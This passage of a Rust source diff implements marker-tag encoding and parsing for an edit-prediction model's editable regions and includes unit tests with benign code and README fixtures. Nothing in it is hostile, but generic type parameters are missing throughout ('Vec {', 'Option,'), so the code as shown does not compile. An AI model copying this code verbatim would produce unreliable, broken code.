tag_end, + }); + search_from = tag_end; + continue; + } + } + search_from = tag_start + prefix.len(); + } + tags +} + +fn collect_marker_tags(text: &str) -> Vec { + collect_tags(text, MARKER_TAG_PREFIX, |s| { + s.parse::().ok().map(|n| n as isize) + }) +} + +fn collect_relative_marker_tags(text: &str) -> Vec { + collect_tags(text, RELATIVE_MARKER_TAG_PREFIX, |s| { + s.parse::().ok() + }) +} + +pub fn nearest_marker_number(cursor_offset: Option, marker_offsets: &[usize]) -> usize { + let cursor = cursor_offset.unwrap_or(0); + marker_offsets + .iter() + .enumerate() + .min_by_key(|(_, offset)| (**offset as isize - cursor as isize).unsigned_abs()) + .map(|(idx, _)| idx + 1) + .unwrap_or(1) +} + +fn cursor_block_index(cursor_offset: Option, marker_offsets: &[usize]) -> usize { + let cursor = cursor_offset.unwrap_or(0); + marker_offsets + .windows(2) + .position(|window| cursor >= window[0] && cursor < window[1]) + .unwrap_or_else(|| marker_offsets.len().saturating_sub(2)) +} + +fn common_prefix_suffix(a: &[u8], b: &[u8]) -> (usize, usize) { + let prefix = a.iter().zip(b.iter()).take_while(|(x, y)| x == y).count(); + let remaining_a = a.len() - prefix; + let remaining_b = b.len() - prefix; + let max_suffix = remaining_a.min(remaining_b); + let suffix = a[a.len() - max_suffix..] + .iter() + .rev() + .zip(b[b.len() - max_suffix..].iter().rev()) + .take_while(|(x, y)| x == y) + .count(); + (prefix, suffix) +} + +/// Map a byte offset from old span coordinates to new span coordinates, +/// using common prefix/suffix within the span for accuracy. 
+fn map_boundary_offset( + old_rel: usize, + old_span_len: usize, + new_span_len: usize, + span_common_prefix: usize, + span_common_suffix: usize, +) -> usize { + if old_rel <= span_common_prefix { + old_rel + } else if old_rel >= old_span_len - span_common_suffix { + new_span_len - (old_span_len - old_rel) + } else { + let old_changed_start = span_common_prefix; + let old_changed_len = old_span_len + .saturating_sub(span_common_prefix) + .saturating_sub(span_common_suffix); + let new_changed_start = span_common_prefix; + let new_changed_len = new_span_len + .saturating_sub(span_common_prefix) + .saturating_sub(span_common_suffix); + + if old_changed_len == 0 { + new_changed_start + } else { + new_changed_start + ((old_rel - old_changed_start) * new_changed_len / old_changed_len) + } + } +} + +fn snap_to_line_start(text: &str, offset: usize) -> usize { + let bounded = offset.min(text.len()); + let bounded = text.floor_char_boundary(bounded); + + if bounded >= text.len() { + return text.len(); + } + + if bounded == 0 || text.as_bytes().get(bounded - 1) == Some(&b'\n') { + return bounded; + } + + if let Some(next_nl_rel) = text[bounded..].find('\n') { + let next = bounded + next_nl_rel + 1; + return text.floor_char_boundary(next.min(text.len())); + } + + let prev_start = text[..bounded].rfind('\n').map(|idx| idx + 1).unwrap_or(0); + text.floor_char_boundary(prev_start) +} + +/// Write the editable region content with byte-exact marker tags, inserting the +/// cursor marker at the given offset within the editable text. +/// +/// The `tag_for_index` closure maps a boundary index to the marker tag string. 
+fn write_editable_with_markers_impl( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, + marker_offsets: &[usize], + tag_for_index: impl Fn(usize) -> String, +) { + let mut cursor_placed = false; + for (i, &offset) in marker_offsets.iter().enumerate() { + output.push_str(&tag_for_index(i)); + + if let Some(&next_offset) = marker_offsets.get(i + 1) { + let block = &editable_text[offset..next_offset]; + if !cursor_placed + && cursor_offset_in_editable >= offset + && cursor_offset_in_editable <= next_offset + { + cursor_placed = true; + let cursor_in_block = cursor_offset_in_editable - offset; + output.push_str(&block[..cursor_in_block]); + output.push_str(cursor_marker); + output.push_str(&block[cursor_in_block..]); + } else { + output.push_str(block); + } + } + } +} + +pub fn write_editable_with_markers_v0316( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets(editable_text); + write_editable_with_markers_impl( + output, + editable_text, + cursor_offset_in_editable, + cursor_marker, + &marker_offsets, + |i| marker_tag(i + 1), + ); +} + +pub fn write_editable_with_markers_v0317( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets(editable_text); + let anchor_idx = cursor_block_index(Some(cursor_offset_in_editable), &marker_offsets); + write_editable_with_markers_impl( + output, + editable_text, + cursor_offset_in_editable, + cursor_marker, + &marker_offsets, + |i| marker_tag_relative(i as isize - anchor_idx as isize), + ); +} + +pub fn write_editable_with_markers_v0318( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets_v0318(editable_text); + write_editable_with_markers_impl( + output, + editable_text, 
+ cursor_offset_in_editable, + cursor_marker, + &marker_offsets, + |i| marker_tag(i + 1), + ); +} + +/// Parse byte-exact model output and reconstruct the full new editable region. +/// +/// `resolve_boundary` maps a parsed tag value to an absolute byte offset in +/// old_editable, given the marker_offsets. Returns `(start_byte, end_byte)` or +/// an error. +fn apply_marker_span_impl( + old_editable: &str, + tags: &[ParsedTag], + output: &str, + resolve_boundaries: impl Fn(isize, isize) -> Result<(usize, usize)>, +) -> Result { + if tags.is_empty() { + return Err(anyhow!("no marker tags found in output")); + } + if tags.len() == 1 { + return Err(anyhow!( + "only one marker tag found in output, expected at least two" + )); + } + + let start_value = tags[0].value; + let end_value = tags[tags.len() - 1].value; + + if start_value == end_value { + return Ok(old_editable.to_string()); + } + + let (start_byte, end_byte) = resolve_boundaries(start_value, end_value)?; + + if start_byte > end_byte { + return Err(anyhow!("start marker must come before end marker")); + } + + let mut new_content = String::new(); + for i in 0..tags.len() - 1 { + let content_start = tags[i].tag_end; + let content_end = tags[i + 1].tag_start; + if content_start <= content_end { + new_content.push_str(&output[content_start..content_end]); + } + } + + let mut result = String::new(); + result.push_str(&old_editable[..start_byte]); + result.push_str(&new_content); + result.push_str(&old_editable[end_byte..]); + + Ok(result) +} + +pub fn apply_marker_span_v0316(old_editable: &str, output: &str) -> Result { + let tags = collect_marker_tags(output); + + // Validate monotonically increasing with no gaps (best-effort warning) + if tags.len() >= 2 { + let start_num = tags[0].value; + let end_num = tags[tags.len() - 1].value; + if start_num != end_num { + let expected: Vec = (start_num..=end_num).collect(); + let actual: Vec = tags.iter().map(|t| t.value).collect(); + if actual != expected { + eprintln!( + 
"V0316 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.", + expected, actual + ); + } + } + } + + let marker_offsets = compute_marker_offsets(old_editable); + apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| { + let start_idx = (start_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let end_idx = (end_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + Ok((start_byte, end_byte)) + }) +} + +pub fn apply_marker_span_v0317( + old_editable: &str, + output: &str, + cursor_offset_in_old: Option, +) -> Result { + let tags = collect_relative_marker_tags(output); + let marker_offsets = compute_marker_offsets(old_editable); + let anchor_idx = cursor_block_index(cursor_offset_in_old, &marker_offsets); + + apply_marker_span_impl(old_editable, &tags, output, |start_delta, end_delta| { + let start_idx_signed = anchor_idx as isize + start_delta; + let end_idx_signed = anchor_idx as isize + end_delta; + if start_idx_signed < 0 || end_idx_signed < 0 { + return Err(anyhow!("relative marker maps before first marker")); + } + let start_idx = usize::try_from(start_idx_signed).context("invalid start marker index")?; + let end_idx = usize::try_from(end_idx_signed).context("invalid end marker index")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + Ok((start_byte, end_byte)) + }) +} + +pub fn apply_marker_span_v0318(old_editable: &str, output: &str) -> Result { + let tags = collect_marker_tags(output); + + if tags.len() >= 2 { + let start_num = tags[0].value; + let end_num = tags[tags.len() - 1].value; + if start_num != 
end_num { + let expected: Vec = (start_num..=end_num).collect(); + let actual: Vec = tags.iter().map(|t| t.value).collect(); + if actual != expected { + eprintln!( + "V0318 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.", + expected, actual + ); + } + } + } + + let marker_offsets = compute_marker_offsets_v0318(old_editable); + apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| { + let start_idx = (start_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let end_idx = (end_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + Ok((start_byte, end_byte)) + }) +} + +/// Encode the training target from old and new editable text. +/// +/// Shared implementation for V0316, V0317, and V0318. The `tag_for_block_idx` +/// closure maps a block index to the appropriate marker tag string. +/// `no_edit_tag` is the marker tag to repeat when there are no edits. 
fn encode_from_old_and_new_impl(
    old_editable: &str,
    new_editable: &str,
    cursor_offset_in_new: Option<usize>,
    cursor_marker: &str,
    end_marker: &str,
    no_edit_tag: &str,
    marker_offsets: &[usize],
    tag_for_block_idx: impl Fn(usize) -> String,
) -> Result<String> {
    // Identical texts encode as the no-edit sentinel: the tag repeated twice.
    if old_editable == new_editable {
        return Ok(format!("{no_edit_tag}{no_edit_tag}{end_marker}"));
    }

    let (common_prefix, common_suffix) =
        common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes());
    let change_end_in_old = old_editable.len() - common_suffix;

    // Find the range of marker blocks that covers the changed span:
    // the last boundary at or before the change start, and the first
    // boundary at or after the change end.
    let mut start_marker_idx = marker_offsets
        .iter()
        .rposition(|&offset| offset <= common_prefix)
        .unwrap_or(0);
    let mut end_marker_idx = marker_offsets
        .iter()
        .position(|&offset| offset >= change_end_in_old)
        .unwrap_or(marker_offsets.len() - 1);

    // A span must cover at least one block; widen by one boundary if needed.
    if start_marker_idx == end_marker_idx {
        if end_marker_idx < marker_offsets.len().saturating_sub(1) {
            end_marker_idx += 1;
        } else if start_marker_idx > 0 {
            start_marker_idx -= 1;
        }
    }

    let old_start = marker_offsets[start_marker_idx];
    let old_end = marker_offsets[end_marker_idx];

    // Map the old span onto the new text: the prefix before the span is
    // unchanged, and the suffix after it has the same length in both texts.
    let new_start = old_start;
    let new_end = new_editable
        .len()
        .saturating_sub(old_editable.len().saturating_sub(old_end));

    let new_span = &new_editable[new_start..new_end];
    let old_span = &old_editable[old_start..old_end];

    let (span_common_prefix, span_common_suffix) =
        common_prefix_suffix(old_span.as_bytes(), new_span.as_bytes());

    let mut result = String::new();
    let mut prev_new_rel = 0usize;
    let mut cursor_placed = false;

    for block_idx in start_marker_idx..end_marker_idx {
        result.push_str(&tag_for_block_idx(block_idx));

        // End of this block within the new span: the last block absorbs the
        // remainder; interior boundaries are mapped from the old span and
        // snapped back to a line start.
        let new_rel_end = if block_idx + 1 == end_marker_idx {
            new_span.len()
        } else {
            let old_rel = marker_offsets[block_idx + 1] - old_start;
            let mapped = map_boundary_offset(
                old_rel,
                old_span.len(),
                new_span.len(),
                span_common_prefix,
                span_common_suffix,
            );
            snap_to_line_start(new_span, mapped)
        };

        // Guard against a mapped boundary moving backwards past the previous one.
        let new_rel_end = new_rel_end.max(prev_new_rel);
        let block_content = &new_span[prev_new_rel..new_rel_end];

        if !cursor_placed {
            if let Some(cursor_offset) = cursor_offset_in_new {
                let abs_start = new_start + prev_new_rel;
                let abs_end = new_start + new_rel_end;
                if cursor_offset >= abs_start && cursor_offset <= abs_end {
                    // Insert the cursor marker once, clamped into this block.
                    cursor_placed = true;
                    let cursor_in_block = cursor_offset - abs_start;
                    let bounded = cursor_in_block.min(block_content.len());
                    result.push_str(&block_content[..bounded]);
                    result.push_str(cursor_marker);
                    result.push_str(&block_content[bounded..]);
                    prev_new_rel = new_rel_end;
                    continue;
                }
            }
        }

        result.push_str(block_content);
        prev_new_rel = new_rel_end;
    }

    result.push_str(&tag_for_block_idx(end_marker_idx));
    result.push_str(end_marker);

    Ok(result)
}

/// V0316 encoder: absolute 1-indexed tags; the no-edit tag is the marker
/// nearest the cursor.
pub fn encode_from_old_and_new_v0316(
    old_editable: &str,
    new_editable: &str,
    cursor_offset_in_new: Option<usize>,
    cursor_marker: &str,
    end_marker: &str,
) -> Result<String> {
    let marker_offsets = compute_marker_offsets(old_editable);
    let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets));
    encode_from_old_and_new_impl(
        old_editable,
        new_editable,
        cursor_offset_in_new,
        cursor_marker,
        end_marker,
        &no_edit_tag,
        &marker_offsets,
        |block_idx| marker_tag(block_idx + 1),
    )
}

/// V0317 encoder: cursor-relative tags; the no-edit tag is always
/// `<|marker-0|>` (the cursor's own block).
pub fn encode_from_old_and_new_v0317(
    old_editable: &str,
    new_editable: &str,
    cursor_offset_in_new: Option<usize>,
    cursor_marker: &str,
    end_marker: &str,
) -> Result<String> {
    let marker_offsets = compute_marker_offsets(old_editable);
    let anchor_idx = cursor_block_index(cursor_offset_in_new, &marker_offsets);
    let no_edit_tag = marker_tag_relative(0);
    encode_from_old_and_new_impl(
        old_editable,
        new_editable,
        cursor_offset_in_new,
        cursor_marker,
        end_marker,
        &no_edit_tag,
        &marker_offsets,
        |block_idx| marker_tag_relative(block_idx as isize - anchor_idx as isize),
    )
}

/// V0318 encoder: absolute 1-indexed tags over the larger-block offsets.
pub fn encode_from_old_and_new_v0318(
old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, +) -> Result { + let marker_offsets = compute_marker_offsets_v0318(old_editable); + let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets)); + encode_from_old_and_new_impl( + old_editable, + new_editable, + cursor_offset_in_new, + cursor_marker, + end_marker, + &no_edit_tag, + &marker_offsets, + |block_idx| marker_tag(block_idx + 1), + ) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_compute_marker_offsets_small_block() { + let text = "aaa\nbbb\nccc\n"; + let offsets = compute_marker_offsets(text); + assert_eq!(offsets, vec![0, text.len()]); + } + + #[test] + fn test_compute_marker_offsets_blank_line_split() { + let text = "aaa\nbbb\nccc\n\nddd\neee\nfff\n"; + let offsets = compute_marker_offsets(text); + assert_eq!(offsets[0], 0); + assert!(offsets.contains(&13), "offsets: {:?}", offsets); + assert_eq!(*offsets.last().unwrap(), text.len()); + } + + #[test] + fn test_compute_marker_offsets_blank_line_split_overrides_pending_hard_cap_boundary() { + let text = "\ +class OCRDataframe(BaseModel): + model_config = ConfigDict(arbitrary_types_allowed=True) + + df: pl.DataFrame + + def page(self, page_number: int = 0) -> \"OCRDataframe\": + # Filter dataframe on specific page + df_page = self.df.filter(pl.col(\"page\") == page_number) + return OCRDataframe(df=df_page) + + def get_text_cell( + self, + cell: Cell, + margin: int = 0, + page_number: Optional[int] = None, + min_confidence: int = 50, + ) -> Optional[str]: + \"\"\" + Get text corresponding to cell +"; + let offsets = compute_marker_offsets(text); + + let def_start = text + .find(" def get_text_cell(") + .expect("def line exists"); + let self_start = text.find(" self,").expect("self line exists"); + + assert!( + offsets.contains(&def_start), + "expected boundary at def line start ({def_start}), got {offsets:?}" + ); + assert!( + 
!offsets.contains(&self_start), + "did not expect boundary at self line start ({self_start}), got {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_blank_line_split_skips_closer_line() { + let text = "\ +impl Plugin for AhoySchedulePlugin { + fn build(&self, app: &mut App) { + app.configure_sets( + self.schedule, + ( + AhoySystems::MoveCharacters, + AhoySystems::ApplyForcesToDynamicRigidBodies, + ) + .chain() + .before(PhysicsSystems::First), + ); + + } +} + +/// System set used by all systems of `bevy_ahoy`. +#[derive(SystemSet, Debug, Clone, Copy, Hash, PartialEq, Eq)] +pub enum AhoySystems { + MoveCharacters, + ApplyForcesToDynamicRigidBodies, +} +"; + let offsets = compute_marker_offsets(text); + + let closer_start = text.find(" }\n").expect("closer line exists"); + let doc_start = text + .find("/// System set used by all systems of `bevy_ahoy`.") + .expect("doc line exists"); + + assert!( + !offsets.contains(&closer_start), + "did not expect boundary at closer line start ({closer_start}), got {offsets:?}" + ); + assert!( + offsets.contains(&doc_start), + "expected boundary at doc line start ({doc_start}), got {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_max_lines_split() { + let text = "1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n"; + let offsets = compute_marker_offsets(text); + assert!(offsets.len() >= 3, "offsets: {:?}", offsets); + } + + #[test] + fn test_compute_marker_offsets_hard_cap_nudges_past_closer_to_case_line() { + let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\ncase 'x': {\nbody\n"; + let offsets = compute_marker_offsets(text); + + let expected = text.find("case 'x': {").expect("case line exists"); + assert!( + offsets.contains(&expected), + "expected nudged boundary at case line start ({expected}), got {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_hard_cap_nudge_respects_max_forward_lines() { + let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\n}\n}\n}\n}\ncase 'x': {\nbody\n"; + let offsets = 
compute_marker_offsets(text); + + let case_start = text.find("case 'x': {").expect("case line exists"); + assert!( + !offsets.contains(&case_start), + "boundary should not nudge beyond max forward lines; offsets: {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_stay_sorted_when_hard_cap_boundary_nudges_forward() { + let text = "\ +aaaaaaaaaa = 1; +bbbbbbbbbb = 2; +cccccccccc = 3; +dddddddddd = 4; +eeeeeeeeee = 5; +ffffffffff = 6; +gggggggggg = 7; +hhhhhhhhhh = 8; + }; + }; + + grafanaDashboards = { + cluster-overview.spec = { + inherit instanceSelector; + folderRef = \"infrastructure\"; + json = builtins.readFile ./grafana/dashboards/cluster-overview.json; + }; + }; +"; + let offsets = compute_marker_offsets(text); + + assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}"); + assert_eq!( + offsets.last().copied(), + Some(text.len()), + "offsets: {offsets:?}" + ); + assert!( + offsets.windows(2).all(|window| window[0] <= window[1]), + "offsets must be sorted: {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_empty() { + let offsets = compute_marker_offsets(""); + assert_eq!(offsets, vec![0, 0]); + } + + #[test] + fn test_compute_marker_offsets_avoid_short_markdown_blocks() { + let text = "\ +# Spree Posts + +This is a Posts extension for [Spree Commerce](https://spreecommerce.org), built with Ruby on Rails. + +## Installation + +1. Add this extension to your Gemfile with this line: + + ```ruby + bundle add spree_posts + ``` + +2. Run the install generator + + ```ruby + bundle exec rails g spree_posts:install + ``` + +3. Restart your server + + If your server was running, restart it so that it can find the assets properly. + +## Developing + +1. Create a dummy app + + ```bash + bundle update + bundle exec rake test_app + ``` + +2. Add your new code +3. Run tests + + ```bash + bundle exec rspec + ``` + +When testing your applications integration with this extension you may use it's factories. 
+Simply add this require statement to your spec_helper: + +```ruby +require 'spree_posts/factories' +``` + +## Releasing a new version + +```shell +bundle exec gem bump -p -t +bundle exec gem release +``` + +For more options please see [gem-release README](https://github.com/svenfuchs/gem-release) + +## Contributing + +If you'd like to contribute, please take a look at the contributing guide. +"; + let offsets = compute_marker_offsets(text); + + assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}"); + assert_eq!( + offsets.last().copied(), + Some(text.len()), + "offsets: {offsets:?}" + ); + + for window in offsets.windows(2) { + let block = &text[window[0]..window[1]]; + let line_count = block.lines().count(); + assert!( + line_count >= V0316_MIN_BLOCK_LINES, + "block too short: {line_count} lines in block {block:?} with offsets {offsets:?}" + ); + } + } + + #[test] + fn test_extract_marker_span() { + let text = "<|marker_2|>\n new content\n<|marker_3|>\n"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 2); + assert_eq!(end, 3); + assert_eq!(content, " new content\n"); + } + + #[test] + fn test_extract_marker_span_multi_line() { + let text = "<|marker_1|>\nline1\nline2\nline3\n<|marker_4|>"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 1); + assert_eq!(end, 4); + assert_eq!(content, "line1\nline2\nline3\n"); + } + + #[test] + fn test_apply_marker_span_basic() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>\naaa\nBBB\nccc\n<|marker_2|>"; + let result = apply_marker_span(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_apply_marker_span_preserves_trailing_blank_line() { + let old = "/\nresult\n\n"; + let output = "<|marker_1|>\n//\nresult\n\n<|marker_2|>"; + let result = apply_marker_span(old, output).unwrap(); + assert_eq!(result, "//\nresult\n\n"); + } + + #[test] + fn test_encode_no_edits() { + let old = 
"aaa\nbbb\nccc\n"; + let result = encode_from_old_and_new( + old, + old, + None, + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + assert_eq!(result, "NO_EDITS\n>>>>>>> UPDATED\n"); + } + + #[test] + fn test_encode_with_change() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = encode_from_old_and_new( + old, + new, + None, + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + assert!(result.contains("<|marker_1|>")); + assert!(result.contains("<|marker_2|>")); + assert!(result.contains("aaa\nBBB\nccc\n")); + assert!(result.ends_with(">>>>>>> UPDATED\n")); + } + + #[test] + fn test_roundtrip_encode_apply() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n"; + let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n"; + let encoded = encode_from_old_and_new( + old, + new, + None, + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + let output = encoded + .strip_suffix(">>>>>>> UPDATED\n") + .expect("should have end marker"); + let reconstructed = apply_marker_span(old, output).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_extract_editable_region_from_markers_multi() { + let text = "prefix\n<|marker_1|>\naaa\nbbb\n<|marker_2|>\nccc\nddd\n<|marker_3|>\nsuffix"; + let parsed = extract_editable_region_from_markers(text).unwrap(); + assert_eq!(parsed, "aaa\nbbb\nccc\nddd"); + } + + #[test] + fn test_extract_editable_region_two_markers() { + let text = "<|marker_1|>\none\ntwo three\n<|marker_2|>"; + let parsed = extract_editable_region_from_markers(text).unwrap(); + assert_eq!(parsed, "one\ntwo three"); + } + + #[test] + fn test_encode_with_cursor() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = encode_from_old_and_new( + old, + new, + Some(5), + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + 
assert!(result.contains("<|user_cursor|>"), "result: {result}"); + assert!(result.contains("B<|user_cursor|>BB"), "result: {result}"); + } + + #[test] + fn test_extract_marker_span_strips_intermediate_markers() { + let text = "<|marker_2|>\nline1\n<|marker_3|>\nline2\n<|marker_4|>"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 2); + assert_eq!(end, 4); + assert_eq!(content, "line1\nline2\n"); + } + + #[test] + fn test_extract_marker_span_strips_multiple_intermediate_markers() { + let text = "<|marker_1|>\naaa\n<|marker_2|>\nbbb\n<|marker_3|>\nccc\n<|marker_4|>"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 1); + assert_eq!(end, 4); + assert_eq!(content, "aaa\nbbb\nccc\n"); + } + + #[test] + fn test_apply_marker_span_with_extra_intermediate_marker() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>\naaa\n<|marker_1|>\nBBB\nccc\n<|marker_2|>"; + let result = apply_marker_span(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_strip_marker_tags_inline() { + assert_eq!(strip_marker_tags("no markers here"), "no markers here"); + assert_eq!(strip_marker_tags("before<|marker_5|>after"), "beforeafter"); + assert_eq!( + strip_marker_tags("line1\n<|marker_3|>\nline2"), + "line1\nline2" + ); + } + + #[test] + fn test_write_editable_with_markers_v0316_byte_exact() { + let editable = "aaa\nbbb\nccc\n"; + let mut output = String::new(); + write_editable_with_markers_v0316(&mut output, editable, 4, "<|user_cursor|>"); + assert!(output.starts_with("<|marker_1|>")); + assert!(output.contains("<|user_cursor|>")); + let stripped = output.replace("<|user_cursor|>", ""); + let stripped = strip_marker_tags(&stripped); + assert_eq!(stripped, editable); + } + + #[test] + fn test_apply_marker_span_v0316_basic() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>aaa\nBBB\nccc\n<|marker_2|>"; + let result = apply_marker_span_v0316(old, 
output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_apply_marker_span_v0316_no_edit() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|><|marker_1|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, old); + } + + #[test] + fn test_apply_marker_span_v0316_no_edit_any_marker() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_2|>ignored content<|marker_2|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, old); + } + + #[test] + fn test_apply_marker_span_v0316_multi_block() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n"; + let marker_offsets = compute_marker_offsets(old); + assert!( + marker_offsets.len() >= 3, + "expected at least 3 offsets, got {:?}", + marker_offsets + ); + + let new_content = "LINE1\nLINE2\nLINE3\n\nLINE5\nLINE6\nLINE7\nLINE8\n"; + let mut output = String::new(); + output.push_str("<|marker_1|>"); + for i in 0..marker_offsets.len() - 1 { + if i > 0 { + output.push_str(&marker_tag(i + 1)); + } + let start = marker_offsets[i]; + let end = marker_offsets[i + 1]; + let block_len = end - start; + output.push_str(&new_content[start..start + block_len]); + } + let last_marker_num = marker_offsets.len(); + output.push_str(&marker_tag(last_marker_num)); + let result = apply_marker_span_v0316(old, &output).unwrap(); + assert_eq!(result, new_content); + } + + #[test] + fn test_apply_marker_span_v0316_byte_exact_no_normalization() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>aaa\nBBB\nccc<|marker_2|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc"); + } + + #[test] + fn test_encode_v0316_no_edits() { + let old = "aaa\nbbb\nccc\n"; + let result = + encode_from_old_and_new_v0316(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.ends_with("<|end|>")); + let stripped = result.strip_suffix("<|end|>").unwrap(); + let result_parsed 
= apply_marker_span_v0316(old, stripped).unwrap(); + assert_eq!(result_parsed, old); + } + + #[test] + fn test_encode_v0316_with_change() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = + encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.contains("<|marker_1|>")); + assert!(result.contains("<|marker_2|>")); + assert!(result.ends_with("<|end|>")); + } + + #[test] + fn test_roundtrip_v0316() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n"; + let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n"; + let encoded = + encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0316(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0316_with_cursor() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = + encode_from_old_and_new_v0316(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.contains("<|user_cursor|>"), "result: {result}"); + assert!(result.contains("B<|user_cursor|>BB"), "result: {result}"); + } + + #[test] + fn test_roundtrip_v0316_multi_block_change() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n"; + let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n"; + let encoded = + encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0316(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_nearest_marker_number() { + let offsets = vec![0, 10, 20, 30]; + assert_eq!(nearest_marker_number(Some(0), &offsets), 1); + assert_eq!(nearest_marker_number(Some(9), 
&offsets), 2); + assert_eq!(nearest_marker_number(Some(15), &offsets), 2); + assert_eq!(nearest_marker_number(Some(25), &offsets), 3); + assert_eq!(nearest_marker_number(Some(30), &offsets), 4); + assert_eq!(nearest_marker_number(None, &offsets), 1); + } + + #[test] + fn test_marker_tag_relative_formats_as_expected() { + assert_eq!(marker_tag_relative(-2), "<|marker-2|>"); + assert_eq!(marker_tag_relative(-1), "<|marker-1|>"); + assert_eq!(marker_tag_relative(0), "<|marker-0|>"); + assert_eq!(marker_tag_relative(1), "<|marker+1|>"); + assert_eq!(marker_tag_relative(2), "<|marker+2|>"); + } + + #[test] + fn test_write_editable_with_markers_v0317_includes_relative_markers_and_cursor() { + let editable = "aaa\nbbb\nccc\n"; + let mut output = String::new(); + write_editable_with_markers_v0317(&mut output, editable, 4, "<|user_cursor|>"); + + assert!(output.contains("<|marker-0|>")); + assert!(output.contains("<|user_cursor|>")); + + let stripped = output.replace("<|user_cursor|>", ""); + let stripped = + collect_relative_marker_tags(&stripped) + .iter() + .fold(stripped.clone(), |acc, marker| { + let tag = &stripped[marker.tag_start..marker.tag_end]; + acc.replace(tag, 